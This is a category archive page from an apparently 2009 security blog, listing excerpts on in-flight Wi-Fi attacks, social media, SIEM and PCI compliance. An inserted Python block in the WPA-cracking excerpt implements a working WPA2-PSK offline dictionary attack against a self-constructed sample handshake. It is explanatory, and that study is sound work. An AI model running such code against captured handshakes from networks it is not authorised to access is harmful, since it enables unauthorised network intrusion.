Category Archives: Enterprise Security

The Best of 2009

2009 was an interesting year for all of us in information security.  We lived through one of the largest breaches in our short history on this spinning blue ball eclipsed only by the inauguration of a unique president-elect.  Anton Chuvakin & I published a book.  I moved my blog here amidst a divestiture of my business at VeriSign.  Apple released a new version of their operating system and a new iPhone.  MasterCard went all crazy on us. I wanted to take the opportunity to thank all of you for an amazing 2009, and I’m looking forward to fantastic things in 2010! Here are the five most popular posts in 2009: Upgrading to Snow Leopard. Ironically enough, the most popular post ...

Wireless On a Plane?

Go-go-gadget WI-FI ON A PLANE! I imagine that the next two weeks will see a significant amount of Wi-Fi trials or sales as parents and children alike take to the skies to visit loved ones over the holidays.  While I am sure it has happened already, you don’t find too many documented cases of wireless attacks happening on airplanes.  There are a couple of ways that attacks can happen. The first attack does not even require an internet connection, just a lazy passenger that does not follow their airline’s electronic device policy.  I’ve seen tons of weary road warriors working on their laptops without removing their 3G data card or with that little Wi-Fi light blinking furiously.  While going after ...

Hackers Love Social Media

USA Today published a great article on Monday about search engines now beginning to index various types of social media.  Bad guys now have even more ways to correlate information and with less of our lives being private (albeit by choice), it makes those stupid security things we do even more relevant. Last month’s Herding Cats tackled Privacy, and specifically the expectation of privacy for future generations.  Social media addicts have the ability to tell the world exactly where they are, what they are doing, and show them visual or auditory evidence by posting geo-tagged videos or audio.   Now add in a near real-time index of this stuff, and you can see how much more powerful (and scary) social ...

Cracking as a Service (CaaS)?

This is not a new concept, and has even been discussed here before.  PC World is reporting that a new service is available for all of us.  Have a captured WPA-PSK handshake you want to crack?  It will cost you $34 and about 20 minutes. WPA Cracker is a new service launched by the same researcher that has spent time attacking SSL/TLS over the last few years.  While the price may be a little high, it certainly represents an interesting shift in activities typically reserved for botnets or universities with large computing resources.  Where else could we take this? Rainbow tables for most hash types are readily available through BitTorrent, or can be generated with simple scripts and a chunk ...
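The economics behind that $34 become obvious once the key derivation is written down. What follows is an added example, not code from the original post or from the WPA Cracker service: it derives the PMK with PBKDF2-HMAC-SHA1 exactly as IEEE 802.11i specifies, expands it to the PTK, and tests each dictionary word against the MIC of message 2 of the four-way handshake. The handshake is constructed in code under an assumed passphrase (SSID, MAC addresses, nonces, replay counter and the word list are all made up for the example; nothing was captured over the air), and the PMK routine is checked against the 802.11i Annex H test vector for passphrase "password" and SSID "IEEE".

```python
import hashlib
import hmac
import struct
from dataclasses import dataclass
from typing import Iterable, Optional

# --- WPA/WPA2-PSK key derivation as IEEE 802.11i specifies it -----------------

def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """Pairwise Master Key = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 rounds, 32 bytes).
    Two SHA-1 blocks are needed for 32 bytes, so every candidate word costs 8192 HMAC-SHA1
    calls before the handshake can be checked at all. That per-word cost is the whole reason
    a cluster (or a paid service) is attractive for this job."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    blocks = (hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4))  # 4 * 20 bytes >= 64 bytes
    return b"".join(blocks)[:64]


def wpa_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Pairwise Transient Key from the PMK, the two MAC addresses and the two nonces."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, frame_mic_zeroed: bytes) -> bytes:
    """Key MIC for key descriptor version 2 (WPA2/CCMP): HMAC-SHA1-128 with the KCK
    (first 16 bytes of the PTK) over the EAPOL-Key frame with its MIC field zeroed."""
    return hmac.new(kck, frame_mic_zeroed, hashlib.sha1).digest()[:16]

# EAPOL header (4) + descriptor type (1) + key info (2) + key length (2) + replay counter (8)
# + nonce (32) + IV (16) + RSC (8) + ID (8) = 81 bytes before the 16-byte MIC field.
MIC_OFFSET = 81


@dataclass
class Handshake:
    """What an offline attack needs from a capture: SSID, both MACs, both nonces and message 2."""
    ssid: str
    aa: bytes      # authenticator (AP) MAC
    spa: bytes     # supplicant (station) MAC
    anonce: bytes
    snonce: bytes
    msg2: bytes    # full EAPOL-Key message 2, MIC included

    @property
    def mic(self) -> bytes:
        return self.msg2[MIC_OFFSET:MIC_OFFSET + 16]

    @property
    def frame_mic_zeroed(self) -> bytes:
        return self.msg2[:MIC_OFFSET] + b"\x00" * 16 + self.msg2[MIC_OFFSET + 16:]


def crack_psk(hs: Handshake, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack: derive PMK -> PTK -> KCK per word and compare the recomputed MIC."""
    for word in wordlist:
        if not 8 <= len(word) <= 63:   # WPA passphrases are 8..63 characters; skip the rest
            continue
        kck = wpa_ptk(wpa_pmk(word, hs.ssid), hs.aa, hs.spa, hs.anonce, hs.snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, hs.frame_mic_zeroed), hs.mic):
            return word
    return None

# --- Constructed sample handshake (assumed values, nothing captured over the air) ---

def build_msg2(snonce: bytes, replay_counter: int, mic: bytes = b"\x00" * 16) -> bytes:
    """EAPOL-Key message 2 of the four-way handshake, key descriptor version 2, RSN IE attached."""
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020c00")  # CCMP/CCMP/PSK
    body = (b"\x02"                          # descriptor type: RSN
            + b"\x01\x0a"                    # key info: version 2, pairwise, MIC present
            + b"\x00\x00"                    # key length (zero in message 2)
            + struct.pack(">Q", replay_counter)
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # nonce, IV, RSC, ID
            + mic
            + struct.pack(">H", len(rsn_ie)) + rsn_ie)
    return b"\x02\x03" + struct.pack(">H", len(body)) + body   # EAPOL v2, type Key


def make_sample_handshake(true_passphrase: str = "password", ssid: str = "IEEE") -> Handshake:
    """Simulate the station's message 2 under the true passphrase. SSID, MACs and nonces are
    made-up example values; "password"/"IEEE" is the 802.11i Annex H test vector pair."""
    aa = bytes.fromhex("001122334455")
    spa = bytes.fromhex("66778899aabb")
    anonce = hashlib.sha256(b"example-anonce").digest()
    snonce = hashlib.sha256(b"example-snonce").digest()
    kck = wpa_ptk(wpa_pmk(true_passphrase, ssid), aa, spa, anonce, snonce)[:16]
    mic = eapol_mic(kck, build_msg2(snonce, 1))          # MIC is computed with the field zeroed
    return Handshake(ssid, aa, spa, anonce, snonce, build_msg2(snonce, 1, mic))


WORDLIST = ["letmein1", "12345678", "password", "qwertyui"]  # constructed toy dictionary

if __name__ == "__main__":
    print("PMK(password, IEEE) =", wpa_pmk("password", "IEEE").hex())
    print("recovered passphrase:", crack_psk(make_sample_handshake(), WORDLIST))
```

Two things worth noticing. The SSID is the PBKDF2 salt, so a precomputed table only helps for the exact network names it was built for, which is why the rainbow-table angle mentioned above works for common default SSIDs and not much else. And the candidate check itself is cheap; the 8192 HMAC-SHA1 calls per word are the entire bill, which is what a few hundred rented cores buy down from days to minutes.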

SIEM and VOIP

What in the world are those two topics doing in the same post?  Well, I’ve got a small roll-up for you.  Here are two blog posts you should read.  Both are short and relevant, exactly what most of us like! The first is a post from my co-author Anton Chuvakin entitled Log Management + SIEM = ?, a post that lays out four scenarios where SIEM and LM can be combined as part of the technology deployment of a security strategy.  This field is something that I’m enjoying watching grow, and in fact my new employer plays in the space.  Log management and SIEM are both critical functions to any security environment.  While mature installations may not be able to ...

Consider Outsourcing Cashless Payments

One of the things that baffles me every time I walk into a retailer struggling with PCI compliance is why management doesn’t consider completely outsourcing all of their cashless payment processing.  I know how we ended up in this situation, but who takes the blame for continuing to push this paradigm forward? Let’s take payments off the table and re-focus on the information we store. Information today is the lifeblood of business.  The value of information is in the process of distilling petabytes of information into actionable tasks that create competitive advantage.  Because information is perceived as highly valuable, the general position of information managers is “store or get access to every piece you can, then we’ll figure out how ...

The Gobble-Gobble of Public Networks

Here in the US we celebrate and give thanks for the harvest on the fourth Thursday of November, one month after our Canadian brethren did.  Does security stop just because most companies in the US are closed?  Nope, in fact, I’d like to give a shout out to all of you folks taking the overtime pay to spend time babysitting your networks.  For you, I am thankful. The PCI Europe meeting has been the topic of several blog posts recently, and here’s yet another one inspired by the Q/A session at that meeting. The Technical Working Group (TWG) must cringe when the definition of public networks is asked in a crowd.  I believe that this was one of those phrases ...

Multi-Function Service Providers, What To Do?

Service providers have dealt with compliance-driven information security mandates for much longer than merchants have.  The catalyst for Visa’s CISP program was reportedly service providers, but enforcement ultimately expanded to all stakeholders.  Regardless of its origins, a certain class of service provider has significant challenges complying with these requirements without shuttering portions of their business. Let’s say that a financial service provider is processing credit card transactions as an acquirer, as well as doing issuer processing for other third-party banks.  How can the business comply with PCI if they also must store prohibited data in order to process on behalf of their issuer customers? That, my friends, is one of the big questions in the industry today. Attendees from both ...

Herding Cats November: got sprintf()?

Ahh, everyone loves some good programming humor, right? RIGHT?!? Yeah, that’s what I thought.  This month I talk about one of the hardest tech jobs out there… the Application Developer.  I used to be one, and I remember the stress of getting projects completed on time, under budget, and with minimal bugs.  It’s a thankless job. So go check out this month’s edition of Herding Cats here!

Too Much Process, the Corporate Lobotomy

Process is a good thing. Some corporate citizens might disagree with that basic statement based on conversations like the following: “You mean I have to go to some website to enter a request for paper clips, and then someone in another office can just reject it because they want to?” Sometimes it doesn’t work.  When you are in situations like this, remember this little saying from a very wise man: “Don’t confuse logic with the process.” Process in other examples can be a really good thing.  Consider the actions you might take to promote code from a test or Q/A environment into production.  The steps you take to do this should be the same every time, and any deviation from ...
